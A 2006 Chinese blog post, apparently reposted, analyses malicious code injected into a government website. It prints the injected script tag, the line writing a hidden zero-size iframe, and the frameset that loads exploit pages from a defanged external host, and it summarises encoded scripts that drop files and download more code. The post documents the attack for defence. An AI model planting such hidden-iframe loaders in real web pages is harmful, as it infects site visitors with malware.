某政府网站被加入的自动下载病毒文件的代码再创新花样(第1版)
来源:互联网 发布:网络用语盐是什么意思 编辑:程序博客网 时间:2024/04/29 07:53
endurer 原创
2006.01.23 第1版
今天浏览前几天说的那个被加入恶意代码的政府网站(详见: 某政府网站被加入的自动下载病毒文件的代码变了花样(第1版) ),又发现了新花样。
政府网站首页加入的代码为:
<script language="JavaScript" src="hxxp://www.***snqc.cn/images/mail.js"></script>
mail.js的内容为:
document.write("<iframe src=hxxp://www.***snqc.cn/images/error.htm width=0 height=0></iframe>");
error.htm的内容为:
<frameset rows="444,0" cols="*">
<frame src="hxxp://help.3721.com/error.html" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="top.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="gif.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://help.3721.com/error.html" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
top.htm 瑞星报为:Exploit.VBS.Phel.z,江民KV报为:Exploit.VBS.Phel.ab,Kaspersky报为:Exploit.VBS.Phel.be。
gif.htm 瑞星报为:Exploit.HTML.Mht,江民KV不报,Kaspersky报为:Exploit.HTML.Mht。
top.htm的内容是用escape()加密的脚本。此脚本会尝试生成文件c:/WINDOWS/Help/apps.chm,自动下载:hxxp://www.***snqc.cn/images/tzd.js。
tzd.js的内容也是用escape()加密的脚本,其中部分代码使用escape()加密了两次。此脚本会尝试生成文件C:/AUTOEXEC.COM,c:/NTDETECT.hta。
tzd.js:瑞星和江民KV报为Exploit.VBS.Phel,Kaspersky报为:Exploit.VBS.Phel.bq。
- 某政府网站被加入的自动下载病毒文件的代码再创新花样(第1版)
- 某政府网站被加入自动下载病毒文件的代码(第3版)
- 某政府网站被加入的自动下载病毒文件的代码变了花样(第3版)
- 又一个自动下载病毒的政府网站(第3版)
- 两个会自动下载恶意程序文件的政府网站
- 一个被加入自动下载灰鸽子的代码的网站
- 又一个下载恶意文件的政府网站
- 又一个被挂木马的政府网站(第3版)
- 又一个带毒的政府网站(第3版)
- 两个下载恶意程序文件的政府网站换花样了
- 某政府网站和某中央企业的网站被挂魔兽网游盗号木马(第2版)
- 01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
- 30行代码的政府网站
- [07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
- [10-01]某政府和某中央企业网站被挂的木马升级了(第2版)
- ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
- 一个被加入下载Trojan.DL.Agent.yhm的代码的网站
- 一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站
- [译]管理Windows 2000 Pro中的DNS客户端缓存
- 一个生成E-mail标签的地址!
- SQL语句性能调整原则
- 假如任正非这个“太阳”不在了,华为怎么办?
- 告诉你中国队为什么老是输
- 某政府网站被加入的自动下载病毒文件的代码再创新花样(第1版)
- Sun全线免费,linux收费,世界到底怎么了?
- 关于tapestry
- Java学习笔记--Lesson1(Java跨平台原理的剖析和Java环境变量的配置
- 这是我的第一篇文章
- 在Spring中实现事务挂起
- Lesson4 MFC消息映射机制和CDC类的使用 ---孙鑫VC++教程
- 嵌入式操作系统课程作业之Write OS
- 风雪凋零人生路